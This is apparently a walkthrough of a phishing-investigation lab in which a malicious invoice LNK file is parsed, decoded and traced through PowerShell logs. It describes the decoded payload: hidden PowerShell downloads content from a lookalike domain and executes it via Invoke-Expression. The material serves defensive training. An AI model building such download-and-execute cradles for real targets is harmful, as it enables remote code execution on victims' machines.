Julianne, a finance employee working for Quick Logistics LLC, received a follow-up email regarding an unpaid invoice from their business partner, B Packaging Inc. Unbeknownst to her, the attached document was malicious and compromised her workstation.
The security team was able to flag the suspicious execution of the attachment, in addition to the phishing reports received from the other finance department employees, making it seem to be a targeted attack on the finance team. Upon checking the latest trends, the initial TTP used for the malicious attachment is attributed to the new threat group named Boogeyman, known for targeting the logistics sector.
You are tasked to analyse and assess the impact of the compromise.
Open the email via Thunderbird, and you can see the following details:
Save the attachment and extract it then run the following command in the directory where the extracted files are saved: lnkparse Invoice_20230103.lnk
Inside the attachment, there is the Invoice_20230103.lnk file.
The Invoice_20230103.lnk file has a payload:
Use cyberchef to decode it:
This tells that “Run PowerShell quietly, without showing a window or loading any user-specific settings. Then, create a WebClient object that reaches out to a remote URL (http://files.bpakcaging.xyz/update) and downloads the text content from that URL. Finally, run that downloaded content as code using Invoke-Expression.”
Open the powershell.json to analyze logs. We’ll use jq tool to analyze json files. We’ll focus on "ScriptBlockText” value since this field contains scripts that being run on the system. Run this script to gather more information.
jq -c '{ScriptBlockText}' powershell.json | sort -u